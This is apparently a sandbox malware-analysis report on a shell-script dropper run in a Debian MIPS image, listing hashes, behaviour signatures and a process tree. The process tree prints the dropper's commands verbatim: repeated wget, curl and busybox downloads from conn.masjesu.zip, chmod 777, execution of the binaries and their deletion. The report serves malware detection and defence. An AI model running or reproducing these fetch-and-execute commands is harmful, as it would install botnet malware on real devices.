Analysis
-
max time kernel
102s -
max time network
100s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
-
Size
10KB
-
MD5
85d74baef7ce93fd942b1abca31bf2dd
-
SHA1
a7e677437c07ce76e9242021261bc10ae3c1728e
-
SHA256
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1
-
SHA512
01166c5328b88a37c6f813c2c230bfb8ab099386a4d9d45d663902833009e012859aa7452ea9d9bff524dc0bf6f3dd938c0df0225b65ece29ab5a364e10a5677
-
SSDEEP
192:ffd11BAjT2qH0+mhJy/EN71BAjTx9wrKS:ffdJqU+mhJy/ENqyrKS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 778 chmod 860 chmod 895 chmod 888 chmod 909 chmod 916 chmod 923 chmod 1000 chmod 867 chmod 965 chmod 972 chmod 979 chmod 993 chmod 1007 chmod 747 chmod 930 chmod 958 chmod 833 chmod 740 chmod 806 chmod 874 chmod 937 chmod 951 chmod 881 chmod 986 chmod 850 chmod 902 chmod 944 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d 741 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h 748 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae 780 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd 807 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 834 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i 851 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u 861 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv 868 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd 875 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo 882 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj 889 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC 896 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH 903 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 910 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d 917 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h 924 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae 931 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd 938 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 945 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i 952 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u 959 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv 966 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd 973 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo 980 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj 987 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC 994 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH 1001 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 1008 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 838 wget 969 curl 973 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd 974 rm 864 curl 866 busybox 876 rm 894 busybox 908 busybox 999 busybox 1003 wget 1004 curl 727 curl 749 rm 853 wget 863 wget 985 busybox 992 busybox 997 curl 739 busybox 891 wget 892 curl 933 wget 989 wget 785 wget 901 busybox 990 curl 955 curl 976 curl 996 wget 744 curl 859 busybox 885 curl 887 busybox 920 curl 898 wget 912 wget 919 wget 925 rm 929 busybox 751 curl 847 curl 857 curl 957 busybox 964 busybox 750 wget 913 curl 922 busybox 924 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h 926 wget 796 curl 805 busybox 915 busybox 927 curl 975 wget 950 busybox 954 wget 978 busybox 716 wget 760 busybox 870 wget 877 wget 934 curl 1006 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d curl File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd curl File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH curl File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj curl File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h curl File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 curl File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h curl File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i curl File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 curl File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC curl File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 curl File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH curl File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u curl File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd curl File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i curl File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC curl File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv curl File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d curl File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo curl File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae curl File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd curl File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo curl File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd curl File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 curl File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u curl File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv curl File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae curl File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj curl
Processes
-
/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:716
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵PID:746
-
-
/bin/chmodchmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:760
-
-
/bin/chmodchmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:805
-
-
/bin/chmodchmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:808
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:809
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:826
-
-
/bin/chmodchmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:849
-
-
/bin/chmodchmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:873
-
-
/bin/chmodchmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:880
-
-
/bin/chmodchmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:915
-
-
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:924
-
-
/bin/rmrm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:936
-
-
/bin/chmodchmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:940
-
-
